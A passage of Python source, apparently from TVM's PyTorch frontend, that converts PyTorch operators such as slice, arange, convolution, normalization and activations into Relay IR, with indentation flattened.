assert all(map(lambda ty: ty == elem_tys[0], elem_tys)), msg
# get_type returns type_name, ctor1, ..., ctorN
# 1 is nil
_, cons, nil = self.prelude.mod.get_type("List")
adt_lst = nil()
for elem in reversed(py_lst):
adt_lst = cons(elem, adt_lst)
return adt_lst
def map_tensor_array_constructor(self, adt_lst, shape):
static_tensor_array_ops = StaticTensorArrayOps(self.prelude, "float32", shape)
static_tensor_array_ops.register()
tensor_create = self.prelude.get_tensor_ctor_static("tensor_constructor", "float32", shape)
return self.prelude.map(tensor_create, adt_lst)
def convert_to_tensor_array(self, adt_lst):
_, cons, nil = self.prelude.mod.get_type("List")
if self.prelude.length(adt_lst) == 0:
return nil()
checked_type = self.infer_type_with_prelude(self.prelude.hd(adt_lst))
shape = checked_type.shape
tensor_array = self.map_tensor_array_constructor(adt_lst, shape)
return tensor_array, tuple(shape)
def infer_shape(self, inputs, mod=None):
"""A method to get the output type of an intermediate node in the graph."""
typ = self.infer_type(inputs, mod=mod)
if hasattr(typ, "shape"):
# Regular operator that outputs tensors
return get_const_tuple(typ.shape)
# The return type is not a tensor, for example List
return typ
def infer_shape_with_prelude(self, inputs):
return self.infer_shape(inputs, mod=self.prelude.mod)
def record_output_type(self, output):
if isinstance(output, tuple):
cleaned_output = [o for o in output if o is not None]
types = self.infer_type_with_prelude(_expr.Tuple(cleaned_output))
for o, t in zip(cleaned_output, types.fields):
self.types[o] = t
elif isinstance(output, _expr.Expr):
self.infer_type_with_prelude(output)
# it can also happen that the type is int or so
def pytorch_promote_types(self, inputs, dtypes):
"""This promotes TVM inputs with TVM dtypes passed like PyTorch would"""
actual_dtypes = []
for i, inp in enumerate(inputs):
if isinstance(inp, _expr.Expr):
idt = self.infer_type(inp).dtype
actual_dtypes.append(idt)
else:
actual_dtypes.append(dtypes[i])
dtypes = actual_dtypes
tensor_dtypes = [dt for inp, dt in zip(inputs, dtypes) if not np.isscalar(inp)]
non_tensor_inputs = [inp for inp in inputs if np.isscalar(inp)]
result_type = _pytorch_result_type(tensor_dtypes, non_tensor_inputs)
results = []
for inp, dt in zip(inputs, dtypes):
if np.isscalar(inp):
results.append(_expr.const(inp, dtype=result_type))
elif dt == result_type:
results.append(inp)
else:
results.append(_op.cast(inp, result_type))
return results
def is_quantized_tensor(self, data):
# If a quantized Torch module is saved and loaded back, dtype will be dropped
# Since dtypes from Torch tensors are not reliable in such cases, we use
# Relay's type inference result to decide if an input tensor is quantized
ty = self.infer_type_with_prelude(data)
return ty.dtype == "uint8"
# Operator implementations
def make_elemwise(self, name):
def elemwise(inputs, input_types):
data0, data1 = self.pytorch_promote_types(inputs[:2], input_types[:2])
return get_relay_op(name)(data0, data1)
return elemwise
def min_max_common(self, name_elemwise, name_reduce, inputs, input_types):
if len(inputs) == 1:
data = self.pytorch_promote_types(inputs[:1], input_types[:1])
return get_relay_op(name_reduce)(data[0])
elif len(inputs) >= 2 and isinstance(inputs[1], int):
data = self.pytorch_promote_types(inputs[:1], input_types[:1])
dim = inputs[1]
keepdims = inputs[2] if len(inputs) > 2 else False
# also return dummy indices
return get_relay_op(name_reduce)(data[0], axis=dim, keepdims=keepdims), None
else:
data0, data1 = self.pytorch_promote_types(inputs[:2], input_types[:2])
return get_relay_op(name_elemwise)(data0, data1)
def max(self, inputs, input_types):
return self.min_max_common("maximum", "max", inputs, input_types)
def min(self, inputs, input_types):
return self.min_max_common("minimum", "min", inputs, input_types)
def make_unary(self, name):
def unary(inputs, input_types):
# this is just to ensure tensor input
(data,) = self.pytorch_promote_types(inputs[:1], input_types[:1])
return get_relay_op(name)(data)
return unary
def log1p(self, inputs, input_types):
# 1_plus_log x = log(x + 1)
(dtype,) = input_types
one = _expr.const(1, dtype=dtype)
return _op.log(inputs[0] + one)
def arange(self, inputs, input_types):
def _get_value(val, dtype):
# dtype is a tvm dtype
if isinstance(val, _expr.Expr):
inp = _op.cast(val, dtype)
ret, _ = try_infer_value(inp, lambda ret: _expr.const(ret, dtype))
else:
ret = _create_typed_const(val, dtype)
return ret
def _get_type(val, inp_type):
if isinstance(val, _expr.Expr):
dtype = str(self.infer_type(val))
return dtype
return inp_type
# PyTorch arange uses the following type semantics:
# - if a dtype is given, start, stop, step are converted to that dtype
# - if no dtype is given and all args are integral, dtype is int64
# - if no dtype is given and there is a float arg, dtype is float32
if len(inputs) == 5:
dtype0 = _get_type(inputs[0], input_types[0])
if inputs[1] is not None:
dtype = _convert_dtype_value(inputs[1])
elif dtype0.startswith("float"):
dtype = "float32"
else:
dtype = "int64"
start = _expr.const(0, dtype)
stop = _get_value(inputs[0], dtype)
step = _expr.const(1, dtype)
elif len(inputs) == 7:
types = [_get_type(inputs[i], input_types[i]) for i in range(3)]
if inputs[3] is not None:
dtype = _convert_dtype_value(inputs[3])
elif any([t.startswith("float") for t in types]):
dtype = "float32"
else:
dtype = "int64"
start = _get_value(inputs[0], dtype)
stop = _get_value(inputs[1], dtype)
step = _get_value(inputs[2], dtype)
else:
msg = "Unknown number of arguments (%d) to parse." % (len(inputs))
raise AssertionError(msg)
return _op.transform.arange(start=start, stop=stop, step=step, dtype=dtype)
def squeeze(self, inputs, input_types):
data = inputs[0]
if len(inputs) == 1:
axis = None
else:
# TODO (t-vi): why is the cast to int needed? similarly elsewhere
axis = [int(inputs[1])]
return _op.transform.squeeze(data, axis)
def unsqueeze(self, inputs, input_types):
data = inputs[0]
axis = inputs[1]
return _op.transform.expand_dims(data, int(axis), 1)
def concatenate(self, inputs, input_types):
def tensor_array_concat(lst, axis):
assert axis == 0, "Tensor array concat supported only for axis 0"
tensor_array, shape = self.convert_to_tensor_array(lst)
concat_shape = (Any(),) + shape[1:]
concat = self.prelude.get_global_var_static("tensor_array_concat", "float32", shape)
concatenated = concat(tensor_array)
static_tensor_array_ops = StaticTensorArrayOps(self.prelude, "float32", concat_shape)
static_tensor_array_ops.register()
get_tensor = self.prelude.get_global_var_static(
"tensor_get_data", "float32", concat_shape
)
return get_tensor(concatenated)
data = inputs[0]
axis = inputs[1]
if not isinstance(data, list):
return tensor_array_concat(data, axis)
if isinstance(data, _expr.Expr):
data = [data]
return _op.tensor.concatenate(data, int(axis))
def slice(self, inputs, input_types):
axis_dtype = "int64"
index_size_limit = sys.maxsize
data = inputs[0]
dshape = self.infer_shape(data)
ndim = len(dshape)
dim = int(inputs[1])
stride = inputs[4]
target_begin, is_begin_const = try_infer_value(
inputs[2], lambda ret: ret.astype(np.int).item(0)
)
target_end, is_end_const = try_infer_value(
inputs[3], lambda ret: ret.astype(np.int).item(0)
)
# A fast path when slicing is nop.
if (
isinstance(target_begin, int)
and isinstance(target_end, int)
and target_begin == 0
and target_end >= index_size_limit
and stride == 1
):
return data
# Process begin
begin = [0] * ndim
begin[dim] = target_begin
if not isinstance(begin[dim], int):
tmp = []
for b in begin:
if isinstance(b, int):
tmp.append(_op.expand_dims(_expr.const(b, axis_dtype), axis=0))
else:
tmp.append(_op.cast(_op.expand_dims(b, axis=0), axis_dtype))
begin = _op.concatenate(tmp, axis=0)
btype = self.infer_type(begin).dtype
if str(btype) != axis_dtype:
begin = _op.cast(begin, axis_dtype)
# Process end
if isinstance(target_end, int) and target_end >= index_size_limit:
target_end = dshape[dim]
if any([isinstance(d, tvm.tir.Any) for d in dshape]):
end = _op.shape_of(data)
else:
end = dshape
if isinstance(target_end, int):
if isinstance(end, list):
end[dim] = target_end
else:
all_static = True
for i, shape_dim in enumerate(dshape):
if i != dim and isinstance(shape_dim, tvm.tir.Any):
all_static = False
if all_static:
end = list(get_const_tuple(dshape))
end[dim] = target_end
else:
target_end = _expr.const(target_end)
end = _op.scatter(
end,
_op.expand_dims(_expr.const(dim), axis=0),
_op.expand_dims(target_end, axis=0),
axis=0,
)
else:
end = _op.cast(_op.shape_of(data), axis_dtype)
if not isinstance(target_end, tvm.tir.Any):
ttype = self.infer_type(target_end).dtype
if str(ttype) != axis_dtype:
target_end = _op.cast(target_end, axis_dtype)
end = _op.scatter(
end,
_op.expand_dims(_expr.const(dim), axis=0),
_op.expand_dims(target_end, axis=0),
axis=0,
)
if not isinstance(end, list):
etype = self.infer_type(end).dtype
if str(etype) != axis_dtype:
end = _op.cast(end, axis_dtype)
strides = [1] * ndim
strides[dim] = stride
return _op.transform.strided_slice(
data, begin=begin, end=end, strides=strides, slice_mode="end"
)
def narrow(self, inputs, input_types):
# Inputs are:
# 0 - the tensor to narrow
# 1 - the dimension along which to narrow
# 2 - the starting dimension
# 3 - the distance to the ending dimension
# Lets find the ending dimension
end = self.add(inputs[2:4], input_types[2:4])
stride = 1
slice_input = inputs[:3] + [end, stride]
slice_types = input_types + ["int32"]
return self.slice(slice_input, slice_types)
def split(self, inputs, input_types):
data = inputs[0]
split_size = int(inputs[1])
dim = int(inputs[2])
split_index = split_size
indices = []
while split_index < self.infer_shape(data)[dim]:
indices.append(split_index)
split_index += split_size
return _op.split(data, indices, dim)
def split_with_sizes(self, inputs, input_types):
data = inputs[0]
sections = inputs[1]
dim = int(inputs[2])
if len(sections) == 1:
# a special case used in torchvision detection models
return _expr.TupleWrapper(_expr.Tuple([data]), 1)
split_index = 0
indices = []
for i in range(len(sections) - 1):
index, _ = try_infer_value(sections[i], lambda ret: int(ret))
split_index += index
indices.append(split_index)
return _op.split(data, indices, dim)
def select(self, inputs, input_types):
data = inputs[0]
dim = int(inputs[1])
index = _wrap_const(inputs[2])
return _op.transform.take(data, index, axis=dim, mode="wrap")
def take(self, inputs, input_types):
data = inputs[0]
indices = _op.cast(inputs[1], "int32")
return _op.transform.take(data, indices=indices, mode="wrap")
def topk(self, inputs, input_types):
data = inputs[0]
axis = int(inputs[2])
is_ascend = not bool(inputs[3])
sort = bool(inputs[4])
if isinstance(inputs[1], _expr.Expr):
k, _ = try_infer_value(inputs[1], lambda ret: ret.tolist())
else:
k = inputs[1]
if not sort:
msg = "Currently supports only sorted output for topk operator."
raise AssertionError(msg)
outs = _op.topk(data, k=k, axis=axis, is_ascend=is_ascend, ret_type="both", dtype="int64")
return outs[0], outs[1]
def reciprocal(self, inputs, input_types):
data = inputs[0]
return _expr.const(1.0, dtype=input_types[0]) / data
def repeat(self, inputs, input_types):
data = inputs[0]
reps = []
for r in inputs[1]:
if isinstance(r, int):
reps.append(r)
else:
reps.append(int(_infer_value(r, {}).numpy()))
return _op.transform.tile(data, reps=reps)
def repeat_interleave(self, inputs, input_types):
data = inputs[0]
if isinstance(inputs[1], int):
repeats = inputs[1]
axis = inputs[2]
elif isinstance(inputs[1], _expr.Expr):
if isinstance(inputs[1], _expr.Constant):
repeats = int(inputs[1].data.numpy())
else:
repeats, _ = try_infer_value(inputs[1], lambda ret: ret.tolist())
axis = inputs[2]
else:
msg = "Only repeat with one value as repeat is currently supported."
raise AssertionError(msg)
if axis is None: # Flatten the data if no axis is given from torch
data = _op.transform.reshape(data, [-1])
axis = 0
return _op.transform.repeat(data, repeats=repeats, axis=axis)
def addcdiv(self, inputs, input_types):
data, t1, t2, c = self.pytorch_promote_types(inputs[:4], input_types[:4])
return data + (c * (t1 / t2))
def addcmul(self, inputs, input_types):
data, t1, t2, c = self.pytorch_promote_types(inputs[:4], input_types[:4])
return data + (c * (t1 * t2))
def where(self, inputs, input_types):
if len(inputs) == 1:
return self.nonzero([inputs[0], True], input_types)
cond = inputs[0]
x, y = self.pytorch_promote_types(inputs[1:3], input_types[1:3])
return _op.where(cond, x, y)
def full_impl(self, data, fill_value, dtype):
size = []
need_reshape = False
new_shape = []
for dim in data:
if isinstance(dim, _expr.Expr):
if isinstance(dim, _expr.Constant):
dim = int(dim.data.numpy())
if isinstance(size, list):
size.append(dim)
new_shape.append(dim)
else:
dim, success = try_infer_value(dim, lambda ret: int(ret), lambda: 0)
new_shape.append(dim)
if success:
if isinstance(size, list):
size.append(dim)
else:
size = None
need_reshape = True
else:
if isinstance(size, list):
size.append(dim)
new_shape.append(dim)
if size is None:
tmp = []
for dim in data:
tmp.append(_op.cast(_op.expand_dims(dim, axis=0), "int64"))
size = _op.concatenate(tmp, axis=0)
out = _op.full(_expr.const(fill_value), size, dtype=dtype)
if need_reshape:
out = _op.reshape(out, new_shape)
return out
def ones(self, inputs, input_types):
data = inputs[0]
import torch
if not isinstance(data, (_expr.Expr, list, torch.Tensor, np.ndarray)):
msg = "Data type %s could not be parsed in ones op" % (type(data))
raise AssertionError(msg)
if inputs[1] is not None:
dtype = _convert_dtype_value(inputs[1])
else:
dtype = self.default_dtype
return self.full_impl(data, 1, dtype)
def ones_like(self, inputs, input_types):
data = inputs[0]
out = _op.ones_like(data)
# If the input and the output datatype is different, do a cast
if inputs[1] is not None:
dtype = _convert_dtype_value(inputs[1])
else:
dtype = self.default_dtype
if input_types[0] != dtype:
out = _op.cast(out, dtype)
return out
def zeros(self, inputs, input_types):
data = inputs[0]
import torch
if not isinstance(data, (_expr.Expr, list, torch.Tensor, np.ndarray)):
msg = "Data type %s could not be parsed in zeros op" % (type(data))
raise AssertionError(msg)
if inputs[1] is not None:
dtype = _convert_dtype_value(inputs[1])
else:
dtype = self.default_dtype
return self.full_impl(data, 0, dtype)
def zeros_like(self, inputs, input_types):
data = inputs[0]
out = _op.zeros_like(data)
# If the input and the output datatype is different, do a cast
if inputs[1] is not None:
dtype = _convert_dtype_value(inputs[1])
else:
dtype = self.default_dtype
if input_types[0] not in dtype:
out = _op.cast(out, dtype)
return out
def full(self, inputs, input_types):
data = inputs[0]
fill_value = inputs[1]
import torch
if not isinstance(data, (_expr.Expr, list, torch.Tensor, np.ndarray)):
msg = "Data type %s could not be parsed in full op" % (type(data))
raise AssertionError(msg)
if inputs[2] is not None: # dtype given
dtype = _convert_dtype_value(inputs[2])
else:
# if dtype is None, torch uses a global default set by torch.set_default_tensor_type()
dtype = self.default_dtype
return self.full_impl(data, fill_value, dtype)
def full_like(self, inputs, input_types):
data = inputs[0]
fill_value = inputs[1]
out = _op.full_like(data, _expr.const(fill_value))
# If the input and the output datatype is different, do a cast
if inputs[2] is not None: # dtype given
dtype = _convert_dtype_value(inputs[2])
else:
# if dtype is None, torch uses a global default set by torch.set_default_tensor_type()
dtype = self.default_dtype
if input_types[0] not in dtype:
out = _op.cast(out, dtype)
return out
def linspace(self, inputs, input_types):
start = inputs[0]
stop = inputs[1]
step = inputs[2]
# Find the spacing between values as step
if step != 1:
step = (stop - start) / (step - 1)
stop = stop + step
else:
stop = start + step
dtype = "float32" if inputs[3] is not None else _convert_dtype_value(inputs[3])
start = _create_typed_const(start, dtype)
stop = _create_typed_const(stop, dtype)
step = _create_typed_const(step, dtype)
return _op.transform.arange(start=start, stop=stop, step=step, dtype=dtype)
def relu(self, inputs, input_types):
data = inputs[0]
if self.is_quantized_tensor(data):
assert len(inputs) == 3, "Input quant param not found in op inputs"
input_zero_point = _expr.const(inputs[2], dtype="int32")
return qnn_torch.quantized_relu(data, input_zero_point)
return _op.nn.relu(data)
def prelu(self, inputs, input_types):
# Reference: https://pytorch.org/docs/stable/generated/torch.nn.PReLU.html#torch.nn.PReLU
data = inputs[0]
dim = self.get_dims(data)
ndims = len(dim)
axis = 0 if ndims == 1 else 1
alpha = _op.broadcast_to(inputs[1], (dim[axis]))
return _op.nn.prelu(data, alpha, axis)
def leaky_relu(self, inputs, input_types):
data = inputs[0]
alpha = float(inputs[1])
return _op.nn.leaky_relu(data, alpha)
def elu(self, inputs, input_types):
data = inputs[0]
dtype = input_types[0]
alpha = _expr.const(-float(inputs[1]), dtype=dtype)
return alpha * _op.nn.relu(_expr.const(1, dtype=dtype) - _op.exp(data)) + _op.nn.relu(data)
def celu(self, inputs, input_types):
data = inputs[0]
dtype = input_types[0]
alpha = _expr.const(float(inputs[1]), dtype=dtype)
return alpha * _op.nn.relu(
_expr.const(1, dtype=dtype) - _op.exp(data / alpha)
) + _op.nn.relu(data)
def gelu(self, inputs, input_types):
data = inputs[0]
dtype = input_types[0]
# gelu is data * normcdf(data)
# normcdf expressed as erf because we don't currently have that intrinsic
# note that there is also a fastgelu variant approximating normcdf
# with tanh and third order polynomials, but this is "true" gelu
return data * (
_expr.const(0.5, dtype=dtype)
+ _op.erf(data * _expr.const(0.5 ** 0.5, dtype=dtype)) * _expr.const(0.5, dtype=dtype)
)
def selu(self, inputs, input_types):
data = inputs[0]
# https://pytorch.org/docs/stable/nn.html#selu
dtype = input_types[0]
alpha = _expr.const(-1.6732632423543772848170429916717, dtype=dtype)
gamma = _expr.const(1.0507009873554804934193349852946, dtype=dtype)
return gamma * (
alpha * _op.nn.relu(_expr.const(1.0, dtype=dtype) - _op.exp(data)) + _op.nn.relu(data)
)
def silu(self, inputs, input_types):
data = inputs[0]
return data * _op.tensor.sigmoid(data)
def log_sigmoid(self, inputs, input_types):
data = inputs[0]
return _op.log(_op.tensor.sigmoid(data))
def hard_sigmoid(self, inputs, input_types):
def _relu6(x):
return _op.tensor.clip(x, 0.0, 6.0)
def func(x):
return _relu6(x + _expr.const(3.0)) / _expr.const(6.0)
if self.is_quantized_tensor(inputs[0]):
input_scale = _expr.const(inputs[1])
input_zero_point = _expr.const(inputs[2])
# PyTorch seems to use the following output qparams, but accuracy
# is broken if we use this.
# TODO(masahi): Revisit this parameter choice
#
# Taken from src/ATen/native/quantized/cpu/kernels/QuantizedOpKernels.cpp
# output_scale = _expr.const(0.00390625) # 1.0 / 2^8
# output_zero_point = _expr.const(-128)
output_scale = input_scale
output_zero_point = input_zero_point
data = qnn.op.dequantize(inputs[0], input_scale, input_zero_point, axis=1)
out = func(data)
return qnn.op.quantize(out, output_scale, output_zero_point, out_dtype="uint8")
return func(inputs[0])
def hard_swish(self, inputs, input_types):
data = inputs[0]
return data * self.hard_sigmoid(inputs, input_types)
def adaptive_avg_pool(self, op, inputs, input_types):
data = inputs[0]
output_size = inputs[1]
def func(x):
return op(x, output_size=output_size)
if self.is_quantized_tensor(data):
return qnn_torch.apply_with_upcast(data, func)
return func(data)
def adaptive_max_pool(self, op, inputs, input_types):
data = inputs[0]
output_size = inputs[1]
# returns dummy indices too
return op(data, output_size=output_size), None
@staticmethod
def convert_const_list(data):
if isinstance(data, list):
for i, _ in enumerate(data):
if isinstance(data[i], _expr.Expr):
data[i] = int(_infer_value_simulated(data[i], {}).numpy())
return data
def maxpool_2d(self, inputs, input_types):
data = inputs[0]
pool_size = self.convert_const_list(inputs[1])
strides = self.convert_const_list(inputs[2] if inputs[2] else pool_size)
padding = inputs[3]
dilation = inputs[4]
ceil_mode = int(inputs[5])
return _op.nn.max_pool2d(
data,
pool_size=pool_size,
strides=strides,
dilation=dilation,
padding=padding,
layout="NCHW",
ceil_mode=ceil_mode,
)
def maxpool_2d_with_indices(self, inputs, input_types):
# returns dummy indices too
return self.maxpool_2d(inputs, input_types), None
def maxpool_1d(self, inputs, input_types):
data = inputs[0]
pool_size = inputs[1]
strides = inputs[2] if inputs[2] else pool_size
padding = inputs[3]
dilation = inputs[4]
ceil_mode = int(inputs[5])
return _op.nn.max_pool1d(
data,
pool_size=pool_size,
strides=strides,
dilation=dilation,
padding=padding,
layout="NCW",
ceil_mode=ceil_mode,
)
def maxpool_3d(self, inputs, input_types):
data = inputs[0]
pool_size = inputs[1]
strides = inputs[2] if inputs[2] else pool_size
padding = inputs[3]
dilation = inputs[4]
ceil_mode = int(inputs[5])
return _op.nn.max_pool3d(
data,
pool_size=pool_size,
strides=strides,
dilation=dilation,
padding=padding,
ceil_mode=ceil_mode,
)
def hardtanh(self, inputs, input_types):
a = inputs[0]
tanh_min = float(inputs[1])
tanh_max = float(inputs[2])
return _op.tensor.clip(a, tanh_min, tanh_max)
def convolution(self, inputs, input_types):
# Use transpose or normal
use_transpose = True if inputs[6] == 1 else False
data = inputs[0]
weight = inputs[1]
bias = inputs[2]
strides = tuple(inputs[3])
padding = tuple(inputs[4])
dilation = tuple(inputs[5])
if isinstance(weight, _expr.Expr):
inferred_shape = self.infer_shape(weight)
weight_shape = []
for infer in inferred_shape:
weight_shape.append(infer)
else:
msg = "Data type %s could not be parsed in conv op" % (type(weight))
raise AssertionError(msg)
# Transposed convolutions have IOHW layout.
if use_transpose:
weight_shape[0], weight_shape[1] = weight_shape[1], weight_shape[0]
channels = weight_shape[0]
groups = int(inputs[8])
# Check if this is depth wise convolution
# We need to reshape weight so that Relay could recognize this is depth wise
# weight_shape[1] is always in_channels // groups
# For depthwise, in_channels == groups, so weight_shape[1] == 1
# If groups > 1 but weight_shape[1] != 1, this is group convolution
if groups > 1 and weight_shape[1] == 1:
channel_multiplier = channels // groups
new_weight_shape = (groups, channel_multiplier) + tuple(weight_shape[2:])
weight = _op.transform.reshape(weight, new_weight_shape)
kernel_size = weight_shape[2:]
use_bias = isinstance(bias, _expr.Expr)
# We are trying to invoke various relay operations through a single conv_op variable.
# However the function signatures for some operations have additional attributes so we
# pass these in along with the standard ones.
additional_arguments = dict()
if use_transpose:
if len(kernel_size) == 3:
conv_op = _op.nn.conv3d_transpose
elif len(kernel_size) == 2:
conv_op = _op.nn.conv2d_transpose
else:
conv_op = _op.nn.conv1d_transpose
output_padding = tuple(inputs[7])
additional_arguments["output_padding"] = output_padding
else:
if len(kernel_size) == 3:
conv_op = _op.nn.conv3d
elif len(kernel_size) == 2:
conv_op = _op.nn.conv2d
else:
conv_op = _op.nn.conv1d
if len(kernel_size) == 3:
data_layout = "NCDHW"
kernel_layout = "OIDHW"
elif len(kernel_size) == 2:
data_layout = "NCHW"
kernel_layout = "OIHW"
if use_transpose:
# Transposed convolutions have IOHW layout.
kernel_layout = "IOHW"
else:
data_layout = "NCW"
kernel_layout = "OIW"
# Conv1d does not currently support grouped convolution so we convert it to conv2d
is_grouped_conv1d = False
if groups > 1 and len(kernel_size) == 1 and not use_transpose:
is_grouped_conv1d = True
conv_op = _op.nn.conv2d
kernel_size = [1] + kernel_size
strides = (1,) + strides
padding = (0,) + padding
dilation = (1,) + dilation
data = _op.expand_dims(data, axis=2)
weight = _op.expand_dims(weight, axis=2)
data_layout = "NCHW"
kernel_layout = "OIHW"
conv_out = conv_op(
data,
weight,
strides=strides,
padding=padding,
dilation=dilation,
groups=groups,
channels=channels,
kernel_size=kernel_size,
data_layout=data_layout,
kernel_layout=kernel_layout,
out_layout="",
out_dtype="",
**additional_arguments,
)
if use_bias:
res = _op.nn.bias_add(conv_out, bias)
else:
res = conv_out
if is_grouped_conv1d:
# Because we conducted grouped conv1d convolution through conv2d we must
# squeeze the output to get the correct result.
res = _op.squeeze(res, axis=[2])
return res
def softmax(self, inputs, input_types):
data = inputs[0]
axis = inputs[1]
if isinstance(axis, str):
axis = int(axis)
return _op.nn.softmax(data, axis=axis)
def threshold(self, inputs, input_types):
data = inputs[0]
return _op.nn.relu(data)
def contiguous(self, inputs, input_types):
return inputs[0]
def batch_norm(self, inputs, input_types):
data = inputs[0]
data_type = input_types[0]
channels = self.infer_shape(data)
if isinstance(inputs[1], _expr.Expr) and isinstance(inputs[2], _expr.Expr):
scale = center = True
weight = inputs[1]
beta = inputs[2]
gamma = weight
else:
scale = center = False
if not scale:
gamma = _create_typed_const(np.ones([int(channels[1])]), data_type)
if not center:
beta = _create_typed_const(np.zeros([int(channels[1])]), data_type)
moving_mean = inputs[3]
moving_var = inputs[4]
epsilon = float(inputs[7])
return _op.nn.batch_norm(
data,
gamma,
beta,
moving_mean,
moving_var,
axis=1,
epsilon=epsilon,
center=center,
scale=scale,
)[0]
def instance_norm(self, inputs, input_types):
data = inputs[0]
data_type = input_types[0]
channels = self.infer_shape(data)
if isinstance(inputs[1], _expr.Expr) and isinstance(inputs[2], _expr.Expr):
scale = center = True
weight = inputs[1]
beta = inputs[2]
gamma = weight
else:
scale = center = False
if not scale:
gamma = _create_typed_const(np.ones([int(channels[1])]), data_type)
if not center:
beta = _create_typed_const(np.zeros([int(channels[1])]), data_type)
epsilon = float(inputs[7])
return _op.nn.instance_norm(
data, gamma, beta, axis=1, epsilon=epsilon, center=center, scale=scale
)
def get_dims(self, data):
import torch
if isinstance(data, _expr.Expr):
dims = self.infer_shape(data)
elif isinstance(data, list):
dims = data
elif isinstance(data, (torch.Tensor, np.ndarray)):
dims = data.shape
else:
msg = "Data type %s could not be parsed" % type(data)
raise AssertionError(msg)
return dims
def layer_norm(self, inputs, input_types):
data = inputs[0]
ndims = len(self.get_dims(inputs[1]))
assert ndims == 1, "Support only normalization over last one dimension."
return _op.nn.layer_norm(
data,
gamma=inputs[2],
beta=inputs[3],
axis=-1,
epsilon=float(inputs[4]),
center=True,
scale=True,
)
def group_norm(self, inputs, input_types):
data = inputs[0]
gamma = inputs[2]
beta = inputs[3]
num_groups = inputs[1]
epsilon = float(inputs[4])
return _op.nn.group_norm(
data,
gamma=gamma,
beta=beta,
num_groups=num_groups,
axis=1,
epsilon=epsilon,
center=True,
scale=True,
)
def transpose(self, inputs, input_types):
data = inputs[0]
import torch
if isinstance(data, _expr.Expr):
ndims = len(self.infer_shape_with_prelude(data))
elif isinstance(data, list):
ndims = data
elif isinstance(data, (torch.Tensor, np.ndarray)):
ndims = data.shape
else:
msg = "Data type %s could not be parsed in transpose op" % (type(data))
raise AssertionError(msg)
if isinstance(data, tvm.runtime.NDArray):
ndims = len(data.shape)
axes = list(range(ndims))
num_inputs = len(inputs)
if num_inputs == 1:
if ndims >= 2:
axes[-1] = ndims - 2
axes[-2] = ndims - 1
if not isinstance(data, _expr.Expr):
data = _expr.const(data)
elif num_inputs == 3:
parse = lambda i: ndims * (i < 0) + i
src, dst = [parse(int(inputs[i])) for i in [1, 2]]
axes[src] = dst
axes[dst] = src
else:
axes = inputs[1]
return _op.transform.transpose(data, axes)
def flatten(self, inputs, input_types):
data = inputs[0]
start = int(inputs[1])
end = int(inputs[2])
dshape = get_const_tuple(self.infer_shape_with_prelude(data))
ndim = len(dshape)
if end < 0:
end += ndim
new_shape = [0] * start
new_shape.append(-1)
squeeze_axes = []
for i in range(start + 1, end + 1):
new_shape.append(1)
squeeze_axes.append(i)
for _ in range(end + 1, ndim):
new_shape.append(0)
out = _op.reshape(data, new_shape)
if squeeze_axes:
out = _op.squeeze(out, axis=squeeze_axes)
return out
def addmm(self, inputs, input_types):
input_mat = inputs[0]
mat1 = inputs[1]
data_type = input_types[1]
mat2 = inputs[2]
beta = inputs[3]
alpha = inputs[4]
if not isinstance(alpha, _expr.Expr) and alpha != 1:
alpha = _create_typed_const(alpha, data_type)
mat1 *= alpha
if not isinstance(beta, _expr.Expr) and beta != 1:
beta = _create_typed_const(beta, data_type)
mat2 *= beta
transposed_mat2 = _op.transform.transpose(mat2, axes=[1, 0])
units = self.infer_shape(transposed_mat2)[0]
dense_out = _op.nn.dense(mat1, transposed_mat2, units=units)
return dense_out + input_mat
def size(self, inputs, input_types):
shape = self.infer_shape_with_prelude(inputs[0])
axis = None
if len(inputs) > 1:
axis = int(inputs[1])
if any(map(lambda s: isinstance(s, tvm.tir.expr.Any), shape)):
if axis is None or isinstance(shape[axis], tvm.tir.expr.Any):
shape_dynamic = _op.shape_of(inputs[0], dtype="int32")
if axis is not None:
return _op.take(shape_dynamic, _expr.const(axis), 0)
return shape_dynamic
if axis is not None:
return _expr.const(shape[axis])
return _expr.const(shape)
def numtotensor(self, inputs, input_types):
val = inputs[0]
dtype = input_types[0]
if isinstance(val, _expr.Expr):
return val
if isinstance(val, tvm.tir.IntImm):
val = val.__int__()
dtype = int
arr = val * np.ones([]).astype(dtype)
return arr
def tensortonum(self, inputs, input_types):
return inputs[0]
def view(self, inputs, input_types):
data = inputs[0]
if len(inputs) == 3:
shape_inp = [inputs[1], self.infer_shape(inputs[2])[0]]
else:
if isinstance(inputs[1], list):
shape_inp = inputs[1]
else:
shape_inp = self.infer_shape(inputs[1])
new_shape = shape_inp
for i, shape in enumerate(shape_inp):
if isinstance(shape, _expr.Expr):
val = _infer_value_simulated(shape, {})
new_shape[i] = val.numpy().item(0)
return _op.transform.reshape(data, new_shape)
def reshape(self, inputs, input_types):
data = inputs[0]
new_shape = inputs[1]
tmp_shape = []
is_dyn = False
for s in new_shape:
if isinstance(s, _expr.Constant):
tmp_shape.append(int(s.data.numpy()))
elif isinstance(s, _expr.Expr):
dim, success = try_infer_value(s, lambda ret: int(ret))
tmp_shape.append(dim)
if not success:
is_dyn = True
else:
tmp_shape.append(s)
if is_dyn:
new_shape = []
for i, s in enumerate(tmp_shape):
if not isinstance(s, _expr.Expr):
s = _expr.const(s, "int64")
else:
s = _op.cast(s, "int64")
new_shape.append(_op.expand_dims(s, axis=0))
new_shape = _op.concatenate(new_shape, axis=0)
else:
new_shape = tmp_shape
return _op.transform.reshape(data, new_shape)
def pixel_shuffle(self, inputs, input_types):
data = inputs[0]
upscale_factor = inputs[1]
upscale_squared = upscale_factor * upscale_factor
b, c, h, w = self.infer_shape(data)
assert (
c % upscale_squared == 0
), "input channel should be divisible by square of upscale_factor"
ndims = len(self.infer_shape_with_prelude(data))
axes = list(range(ndims))
num_inputs = len(inputs)
oc = c // upscale_squared
oh = h * upscale_factor
ow = w * upscale_factor
new_shape = [b, oc, upscale_factor, upscale_factor, h, w]
out_shape = [b, oc, oh, ow]
data = _op.transform.reshape(data, new_shape)
# The data will be transposed to
# [b, oc, h, upscale_factor, w, upscale_factor]
# for further reshape
axes = [0, 1, 4, 2, 5, 3]
data = _op.transform.transpose(data, axes)
return _op.transform.reshape(data, out_shape)
def clone(self, inputs, input_types):
data = inputs[0]
return _op.tensor.copy(data)
def log_softmax(self, inputs, input_types):
data = inputs[0]
axis = int(inputs[1])
return _op.nn.log_softmax(data, axis)
def sigmoid(self, inputs, input_types):
data = inputs[0]
return _op.tensor.sigmoid(data)
def softplus(self, inputs, input_types):
data = inputs[0]
dtype = input_types[0]
beta = _expr.const(float(inputs[1]), dtype=dtype)
